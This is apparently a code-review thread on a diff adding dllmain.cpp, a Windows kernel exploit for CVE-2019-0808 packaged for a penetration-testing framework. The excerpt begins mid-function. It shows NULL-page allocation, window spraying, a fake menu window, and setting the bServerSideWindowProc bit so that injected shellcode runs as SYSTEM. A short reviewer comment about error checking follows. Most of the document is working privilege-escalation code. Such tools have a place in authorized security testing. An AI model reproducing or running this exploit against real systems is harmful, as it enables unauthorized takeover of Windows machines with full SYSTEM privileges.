external/source/exploits/CVE-2019-0808/NtUserMNDragOverExploit/dllmain.cpp

```diff
@@ -0,0 +1,686 @@
+			if (SetWindowTextA(hSecondaryWindow, "\x06") == 0) {
+				dprintf("[!] SetWindowTextA couldn't set the bServerSideWindowProc bit. Error was: 0x%08X\r\n", GetLastError());
+				ExitProcess(-1);
+			}
+			else {
+				dprintf("Successfully set the bServerSideWindowProc bit at: 0x%08X\r\n", (secondaryWindowAddress + 0x16));
+				dprintf("Sending hSecondaryWindow a WM_ENTERIDLE message to trigger the execution of the shellcode as SYSTEM.\r\n");
+				SendMessageA(hSecondaryWindow, WM_ENTERIDLE, NULL, NULL);
+				if (success == TRUE) {
+					dprintf("[*] Successfully exploited CVE-2019-0808 and triggered the shellcode!\r\n");
+				}
+				else {
+					dprintf("[!] Didn't exploit the program. For some reason our privileges were not appropriate.\r\n");
+					ExitProcess(-1);
+				}
+			}
+		}
+	}
+	return CallNextHookEx(0, code, wParam, lParam);
+}
+
+int exploit(PMSF_PAYLOAD pMsfPayload)
+{
+	dprintf("[*] Exploiting!\r\n");
+
+	// Create the primary popup menu and its submenu
+	HMENU hMenuRoot = CreatePopupMenu();
+	HMENU hMenuSub = CreatePopupMenu();
+
+	// Get a HINSTANCE handle to the current process.
+	HINSTANCE hInst = GetModuleHandleA(NULL);
+
+	// Get the address of NtAllocateVirtualMemory from ntdll.dll's export table.
+	pfnNtAllocateVirtualMemory = (NTAllocateVirtualMemory)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory");
+
+	// Set the window hook and the event hook.
+	SetWindowsHookEx(WH_CALLWNDPROC, (HOOKPROC)WindowHookProc, hInst, GetCurrentThreadId());
+	SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART, hInst, DisplayEventProc, GetCurrentProcessId(), GetCurrentThreadId(), 0);
+
+	// Set up the buffers for the call to NtUserMNDragOver().
+	CHAR buf[0x100] = { 0 };
+	POINT pt;
+	pt.x = 2;
+	pt.y = 2;
+
+	// Allocate the NULL page. If this fails, exit the program.
+	if (allocateNullPage() == FALSE) {
+		dprintf("[!] Couldn't allocate the NULL page!\r\n");
+	}
+	else {
+		dprintf("[*] Allocated the NULL page!\r\n");
+	}
+
+	// Just to be sure that these modules are loaded, lets load them again.
+	// Also allows the attacker to grab the address where user32.dll is loaded in memory.
+	HMODULE hUser32 = LoadLibraryW(L"user32.dll");
+	LoadLibraryW(L"gdi32.dll");
+
+	// Find the address of HMValidateHandle using the address of user32.dll
+	if (findHMValidateHandleAddress(hUser32) == FALSE) {
+		dprintf("[!] Couldn't locate the address of HMValidateHandle!\r\n");
+		ExitProcess(-1);
+	}
+
+	// Spray the windows and find two that are less than 0x3fd00 apart in memory.
+	if (sprayWindows() == FALSE) {
+		dprintf("[!] Couldn't find two tagWND objects less than 0x3fd00 apart in memory after the spray!\r\n");
+		ExitProcess(-1);
+	}
+
+	// Create the malicious window, which will have its spMenu field set to NULL.
+	hWndFakeMenu = CreateWindowA("#32768", "MN", WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, hInst, nullptr);

```

Comment:
Should check the value of `hWndFakeMenu` and make sure that the call to `CreateWindowA` actually succeeded.

Reply:
Added additional validation and a `dprintf` call if this call fails.